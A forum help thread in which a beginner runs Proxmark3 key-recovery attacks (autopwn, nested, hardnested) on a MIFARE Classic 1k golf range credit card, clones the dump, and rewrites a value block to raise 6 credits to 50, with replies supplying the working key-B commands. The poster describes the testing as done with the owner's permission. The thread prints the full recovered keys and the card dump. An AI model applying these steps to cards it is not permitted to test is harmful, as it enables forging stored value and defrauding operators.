MIFARE Classic 1k - Cloning + Changing Value of Block

Wook · January 28, 2026, 10:25am

Hello,

I’m trying to do two things:

Clone a MIFARE Classic 1k card, but I’m not sure if I’m doing it correctly as I’m getting an error.
Trying to edit the value of a block, but I keep getting an Auth error.

This is the commands I’m running in this order:

[usb] pm3 → hf mf autopwn

[!] No known key was supplied, key recovery might fail
[+] loaded 5 user keys
[+] loaded 61 hardcoded keys
[=] Running strategy 1
[=] …
[=] Running strategy 2
[=] …
[+] Target sector 0 key type A – found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack)
[+] Target sector 1 key type A – found valid key [ A0A1A2A3A4A5 ]

[+] Target block 0 key type B
[-] Nested attack failed, trying again (1/6)
[+] Target block 0 key type B
[-] Nested attack failed, trying again (2/6)
[+] Found 1 key candidate
[+] Target block 0 key type B – found valid key [ 988C940B0BB8 ]
[+] Target sector 0 key type B – found valid key [ 988C940B0BB8 ]

[+] Found 1 key candidate
[+] Target block 4 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 1 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 4 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 5 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 6 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 7 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 8 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 9 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 10 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 11 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 12 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 13 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 14 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 15 key type B – found valid key [ 8D89AB80500D ]

[+] Target block 8 key type A
[-] Nested attack failed, trying again (1/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (2/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (3/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (4/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (5/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (6/6)
[+] Target block 8 key type A
[-] Nested attack failed, moving to hardnested

[=] ---------±--------±--------------------------------------------------------±----------------±------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------±--------±--------------------------------------------------------±----------------±------
[=] 0 | 0 | Start using 8 threads and AVX2 SIMD core | |
[=] 0 | 0 | Brute force benchmark: 1231 million (2^30.2) keys/s | 140737488355328 | 32h
[=] 3 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 3266 ms | 140737488355328 | 32h
[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 32h
[=] 7 | 112 | Apply bit flip properties | 103574749184 | 84s
[=] 8 | 224 | Apply bit flip properties | 34574442496 | 28s
[=] 8 | 335 | Apply bit flip properties | 18684311552 | 15s
[=] 9 | 447 | Apply bit flip properties | 17186537472 | 14s
[=] 10 | 559 | Apply bit flip properties | 15895958528 | 13s
[=] 11 | 671 | Apply bit flip properties | 15555934208 | 13s
[=] 12 | 783 | Apply bit flip properties | 15555934208 | 13s
[=] 12 | 890 | Apply bit flip properties | 15555934208 | 13s
[=] 13 | 1002 | Apply bit flip properties | 15555934208 | 13s
[=] 14 | 1110 | Apply bit flip properties | 15555934208 | 13s
[=] 15 | 1221 | Apply bit flip properties | 15555934208 | 13s
[=] 15 | 1329 | Apply bit flip properties | 15555934208 | 13s
[=] 16 | 1438 | Apply bit flip properties | 15555934208 | 13s
[=] 17 | 1548 | Apply bit flip properties | 15555934208 | 13s
[=] 19 | 1660 | Apply Sum property. Sum(a0) = 128 | 1178639872 | 1s
[=] 20 | 1770 | Apply bit flip properties | 1178639872 | 1s
[=] 21 | 1872 | Apply bit flip properties | 1178639872 | 1s
[=] 22 | 1982 | Apply bit flip properties | 1178639872 | 1s
[=] 22 | 1982 | (Ignoring Sum(a8) properties) | 1178639872 | 1s
[=] 24 | 1982 | Brute force phase completed. Key found: 9FA570FA1A97 | 0 | 0s
[=] ---------±--------±--------------------------------------------------------±----------------±------
[+] Target sector 2 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 3 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 4 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 5 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 6 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 7 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 8 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 9 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 10 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 11 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 12 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 13 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 14 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 15 key type A – found valid key [ 9FA570FA1A97 ]

[=] ---------±--------±------------------------- [=] | | [=] Time | #nonces [=] ---------±--------±------------------------- [=] 0 | 0 | Start using 8 threads [=] 0 | 0 | Brute force benchmark: [=] 3 | 0 | Loaded 0 RAW / 351 [=] 3 | 0 | Using 239 precalculated [=] 7 | 112 | Apply bit flip properties [=] 7 | 221 | Apply bit flip properties [=] 8 | 333 | Apply bit flip properties [=] 9 | 444 | Apply bit flip properties [=] 10 | 552 | Apply bit flip properties [=] 11 | 664 | Apply bit flip properties [=] 12 | 773 | Apply bit flip properties [=] 13 | 885 | Apply bit flip properties [=] 13 | 997 | Apply bit flip properties [=] 14 | 1109 | Apply bit flip properties [=] 14 | 1221 | Apply bit flip properties [#] AcquireEncryptedNonces: Auth1 error
[=] 15 | 1330 | Apply bit flip properties [=] 16 | 1442 | Apply bit flip properties [=] 18 | 1549 | Apply Sum property. Sum(a0) = 192 [=] 18 | 1655 | Apply bit flip properties [=] 19 | 1766 | Apply bit flip properties [=] 20 | 1874 | Apply bit flip properties [=] 20 | 1984 | Apply bit flip properties [=] 21 | 2096 | Apply bit flip properties [=] 22 | 2201 | Apply bit flip properties [=] 23 | 2312 | Apply bit flip properties [=] 24 | 2312 | (1. guess: Sum(a8) = 256) [=] 24 | 2312 | Apply Sum(a8) and [=] 24 | 2312 | (2. guess: Sum(a8) = 192) [=] 24 | 2312 | Apply Sum(a8) and [=] 24 | 2312 | (3. guess: Sum(a8) = 128) [=] 27 | 2312 | Apply Sum(a8) and [=] 32 | 2312 | Brute force phase: 74.84% [=] 34 | 2312 | (4. guess: Sum(a8) = 160) [=] 35 | 2312 | Apply Sum(a8) and [=] 35 | 2312 | Brute force phase completed. [=] ---------±--------±------------------------- [+] Target sector 2 key type B – found [+] Target sector 3 key type B – found -------------------------------±----------------±------
| Expected to brute force
| Activity | #states | time
-------------------------------±----------------±------
and AVX2 SIMD core | |
1315 million (2^30.3) keys/s | 140737488355328 | 30h
LZ4 / 0 BZ2 in 3125 ms | 140737488355328 | 30h
bitflip state tables | 140737488355328 | 30h
| 3041197293568 | 39min
| 866465873920 | 11min
| 851320569856 | 11min
| 595516588032 | 8min
| 580852973568 | 7min
| 580338057216 | 7min
| 580338057216 | 7min
| 580338057216 | 7min
| 580338057216 | 7min
| 580338057216 | 7min
| 580338057216 | 7min
| 580338057216 | 7min
| 580338057216 | 7min
| 35749797888 | 27s
| 35749797888 | 27s
| 35749797888 | 27s
| 20103917568 | 15s
| 48540049408 | 37s
| 48540049408 | 37s
| 48540049408 | 37s
| 48540049408 | 37s
| 48540049408 | 37s
all bytes bitflip properties | 47577903104 | 36s
| 194851487744 | 2min
all bytes bitflip properties | 191847432192 | 2min
| 297802924032 | 4min
all bytes bitflip properties | 34374225920 | 26s
| 30280030208 | 23s
| 41970249728 | 32s
all bytes bitflip properties | 12321203200 | 9s
Key found: D88C27DFC37E | 0 | 0s
-------------------------------±----------------±------
valid key [ D88C27DFC37E ]
valid key [ D88C27DFC37E ]

[+] -----±----±-------------±–±-------------±—
[+] Sec | Blk | key A |res| key B |res
[+] -----±----±-------------±–±-------------±—
[+] 000 | 003 | A0A1A2A3A4A5 | D | 988C940B0BB8 | N
[+] 001 | 007 | A0A1A2A3A4A5 | D | 8D89AB80500D | N
[+] 002 | 011 | 9FA570FA1A97 | H | D88C27DFC37E | H
[+] 003 | 015 | 9FA570FA1A97 | R | D88C27DFC37E | R
[+] 004 | 019 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 005 | 023 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 006 | 027 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 007 | 031 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 008 | 035 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 009 | 039 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 010 | 043 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 011 | 047 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 012 | 051 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 013 | 055 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 014 | 059 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 015 | 063 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] -----±----±-------------±–±-------------±—
[=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA )
[?] Hint: MAD key detected. Try hf mf mad for more details

[+] Generating binary key file
[+] Found keys have been dumped to C:\ProxSpace\pm3/hf-mf-CD30EEB4-key.bin
[=] –[ FFFFFFFFFFFF ]– has been inserted for unknown keys where res is 0
[=] Transferring keys to simulator memory ( ok )
[=] Dumping card content to emulator memory (Cmd Error: 04 can occur)
[=] downloading card content from emulator memory
[+] Saved 1024 bytes to binary file C:\ProxSpace\pm3/hf-mf-CD30EEB4-dump.bin
[+] Saved to json file C:\ProxSpace\pm3/hf-mf-CD30EEB4-dump.json
[=] Autopwn execution time: 91 seconds

Then to clone the dump to a new card I’ve ran the below:

[usb] pm3 → hf mf restore --1k --uid CD30EEB4 -k hf-mf-CD30EEB4-key.bin
[+] Loaded binary key file hf-mf-CD30EEB4-key.bin
[+] Loaded 1024 bytes from binary file hf-mf-CD30EEB4-dump.bin

[=] blk | data | status
[=] -----±------------------------------------------------±---------------
[=] 0 | CD 30 EE B4 A7 08 04 00 01 DB C6 4D 3D 5C 42 1D | ( fail ) key B
[=] 0 | CD 30 EE B4 A7 08 04 00 01 DB C6 4D 3D 5C 42 1D | ( fail ) key A
[=] 1 | 48 00 04 00 00 D0 02 D0 02 00 02 00 02 00 02 00 | ( ok )
[=] 2 | 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 | ( ok )
[=] 3 | A0 A1 A2 A3 A4 A5 78 77 88 C1 98 8C 94 0B 0B B8 | ( ok )
[=] 4 | CA 33 30 33 35 35 30 38 39 34 31 0B 4C 65 69 73 | ( ok )
[=] 5 | 75 72 65 43 61 72 64 47 4C 65 69 73 75 72 65 00 | ( ok )
[=] 6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 7 | A0 A1 A2 A3 A4 A5 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 8 | 06 00 00 00 F9 FF FF FF 06 00 00 00 08 F7 08 F7 | ( ok )
[=] 9 | 11 6E 14 59 0C 60 00 86 18 00 11 00 00 00 00 00 | ( ok )
[=] 10 | 13 93 55 81 34 F3 93 55 81 05 6C 94 59 0C 61 00 | ( ok )
[=] 11 | 9F A5 70 FA 1A 97 68 77 89 00 D8 8C 27 DF C3 7E | ( ok )
[=] 12 | 00 00 00 00 FF FF FF FF 00 00 00 00 0C F3 0C F3 | ( ok )
[=] 13 | 11 6E 14 59 0C 60 00 86 18 00 11 00 00 00 00 00 | ( ok )
[=] 14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 15 | 9F A5 70 FA 1A 97 68 77 89 00 D8 8C 27 DF C3 7E | ( ok )
[=] 16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 19 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 23 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 27 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 31 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 35 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 39 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 43 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 47 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 51 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 55 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 59 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 63 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] -----±------------------------------------------------±---------------

[?] Hint: Try hf mf dump --ns to verify
[=] Done!

But you can see on the first two lines for block 0 fail, is this normal and have I done everything correct?

I’d like to change the value of block 8 which is currently:

06000000F9FFFFFF0600000008F708F7

to

32000000CDFFFFFF3200000008F708F7

I’ve tried running the below command on the card I’ve just written to, but I keep getting an Auth Error.

hf mf wrbl --blk 8 -a -k 9FA570FA1A97 -d 32000000CDFFFFFF3200000008F708F7

Any help on both issues would be much appreciated. Thank you.

Aoxhwjfoavdlhsvfpzha · January 28, 2026, 10:50am

You can’t write to block 0 on normal cards, you need a special “Magic” card, is that what you have? You can check for magic capabilities with hf mf info

hf mf wrbl --blk 8 -b -k D88C27DFC37E -d 32000000CDFFFFFF3200000008F708F7

Should work, I think

Wook · January 28, 2026, 10:54am

You are a genius! Thank you for the support, turns out the cards I have are not magic ones which explains issue 1. Your command for issue 2 has worked, thank you

Will the clone card still work fine even though it failed block 0?

Aoxhwjfoavdlhsvfpzha · January 28, 2026, 11:00am

Hard to say without knowing more about the system, the quickest way to find out would be to test it

Wook · January 28, 2026, 11:02am

Thanks, the strange thing I’m now experiencing is when i run the write to block command and it says ok:

[usb] pm3 → hf mf wrbl --blk 8 -b -k D88C27DFC37E -d 32000000CDFFFFFF3200000008F708F7
[=] Writing block no 8, key type:B - D88C27DFC37E
[=] data: 32 00 00 00 CD FF FF FF 32 00 00 00 08 F7 08 F7
[+] Write ( ok )
[?] Hint: Try hf mf rdbl to verify

When i run the read command to verify, i get an Auth Error even though I’m using the same key used to write.

[usb] pm3 → hf mf rdbl --blk 8 -k D88C27DFC37E
[#] Auth error

Aoxhwjfoavdlhsvfpzha · January 28, 2026, 11:06am

hf mf rdbl --blk 8 -k D88C27DFC37E -b

or

hf mf rdbl --blk 8 -k 9FA570FA1A97

Should work. Default behavior is to auth as key ‘A’, but D88C27DFC37E is key ‘B’

You can learn more about the commands by adding the --help flag, or you can browse an online reference here, if you prefer:

Wook · January 28, 2026, 11:12am

Thank you once again for your support. You’ve been a great help, I’m very new to all this (1st day today).

Aoxhwjfoavdlhsvfpzha · January 28, 2026, 11:13am

Pretty good progress for your first time, better than I did

Feel free to ask if you have any more questions, and/or update us if your copy ends up working

Wook · January 28, 2026, 8:52pm

Hello,

So today I went to try one of the cloned cards, before I let you know what happened it’s probably best I give you the background story of what I’m trying to do.

So the card I’ve cloned is one that belongs to me. I used it at a Golf Driving Range, they have a machine which will read the card to see how many credits are on it, it will then write to the card and decrease the number if credits by 1, once that’s done then it will dispense 25 golf balls for you to hit.

The device used is not linked to a system or the internet, it simply reads what’s on the card to understand how many credits there are and then decrease it by one. At any point I can go to the owner and ask him to add another 10 credits to the card and he’ll use a device that reads/writes to the card to add the additional credits.

Myself and the owner (good friends) where talking about how secure these cards are, I told him it’s probably not secure at all especially since the source of truth is what ever is written on the card. There’s no second system check to validate the data on the card is correct. I then said it’s probably easy to clone the cards that have credit on or even increase the number of credits on a card. He told me to see what I can do.

Based on that, i cloned my card which had 6 credits on and restored it onto a new card, we’ll call this Card 1.

I also did the same and put it onto another card, but this time I changed the value of sector 2, block 8 which stores the credit value. I changed this from 6 to 50. We’ll call this Card 2.

I then went to the place and tried to use Card 1, it recognised the card, displayed on the screen that it had 6 credits. But then failed to dispense the balls saying “Vending Error”.

I then tried my real card, all worked fine and balls dispensed.

I then tried Card 2, it recognised the card, displayed on the screen that it had 50 credits. But again, then have “Vending Error”.

Now I know from the posts above, when I restore the clone card data to a new card, it failed to restore block 0. I’ve ordered magic cards which I’ll then restore the data to one of those cards to see if that fixes it (maybe the cards need to all have the same UID as the original to work).

But the issue does seem to be it’s failing to write back to the card and decrease the number of credits by one. Could there be anything on the card/blocks that could stop this?

I’ve attached the bin and key data if it helps.

Any help would be much appreciated

keydata.zip (514 Bytes)

Andr705 · February 28, 2026, 5:05pm

Lets a bit explane :

Right Conmand:

hf mf wrbl --blk 8 -b -k D88C27DFC37E -d 32000000CDFFFFFF3200000008F708F7

whrre used Key-B vs A.

But why? Lets flw:

Block to re-write # 08 - which Sector #02 where Trailer Block # 011 - access bit and Key-A and B:

Dump:
Sector: [+] 002
Block | 011 |
Key-A: 9FA570FA1A97 | H |
KeyB: D88C27DFC37E | H

Full Trailer :
[=] 11 | 9F A5 70 FA 1A 97 68 77 89 00 D8 8C 27 DF C3 7E | ( ok )

where Access bites:
68 77 89

to decode by Mifare Classic Tools: (save time to escape HEX → BIN —> BigEndian → access bites…)
Read: Key-A or B
Write: Key-B